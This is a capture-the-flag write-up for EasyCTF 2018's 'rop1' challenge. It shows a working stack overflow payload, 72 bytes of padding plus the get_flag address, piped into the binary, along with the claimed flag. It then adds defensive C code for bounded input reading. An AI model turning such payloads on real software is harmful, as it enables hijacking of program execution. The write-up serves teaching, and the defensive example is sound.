EasyCTF_2018: rop1

Category: Binary Exploitation
Points: 120
Description:

Go to /problems/rop1 on the shell server and tell me what's in flag.txt.


We are given two relevant files, rop1 and rop1.c. This one is also relatively easy: just get the address of the function,

0x00400646    1 17           sym.get_flag

and the buffer size,

void get_input()
{
    char inp[64];
    /* ... (the read into inp is not shown in this excerpt) ... */
    printf("You said: %s\n", inp);
}

Add 8 to it to cover the saved base pointer, which gives 72 bytes of padding before the return address, and prepare your payload,

$ python -c "print('A' * 72 + '\x46\x06\x40\x00')" | ./rop1
You said: AAAAAAAAAA[...]
Segmentation fault (core dumped)

Therefore, the flag is easyctf{r0ps_and_h0ps}.
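
For the defensive side of this challenge, the following is an added example, not code from rop1.c or the challenge authors: a bounded line read into a 64-byte buffer like inp, exercised with a constructed 76-byte line (the same length as the payload above) so the excess never reaches the saved return address. The names read_line_bounded, demo, demo_truncated and demo_second are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define INP_SIZE 64   /* same size as inp[] in the rop1.c excerpt */

/* Hypothetical helper: read one line into buf (cap bytes including NUL).
 * Returns bytes stored, or -1 on EOF/error. *truncated is set to 1 when
 * the line was longer than the buffer and the excess was discarded. */
int read_line_bounded(FILE *in, char *buf, size_t cap, int *truncated)
{
    *truncated = 0;
    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';          /* whole line fit: drop the newline */
    } else {
        int c;  /* drain the rest of the line so it cannot leak into the next read */
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;
    }
    return (int)len;
}

int demo_truncated;            /* results of demo(), kept for inspection */
char demo_second[INP_SIZE];

/* Constructed input: a 76-byte line (72 filler bytes plus 4 more, the
 * same length as the page's payload) followed by a normal line.
 * Returns the number of bytes stored for the first line. */
int demo(void)
{
    char inp[INP_SIZE];
    int t2;
    FILE *f = tmpfile();
    if (f == NULL)
        return -1;
    for (int i = 0; i < 76; i++)
        fputc('A', f);
    fputs("\nhello\n", f);
    rewind(f);
    int n = read_line_bounded(f, inp, sizeof inp, &demo_truncated);
    read_line_bounded(f, demo_second, sizeof demo_second, &t2);
    fclose(f);
    return n;
}

int main(void)
{
    printf("stored=%d ", demo());
    printf("truncated=%d next=\"%s\"\n", demo_truncated, demo_second);
    return 0;
}
```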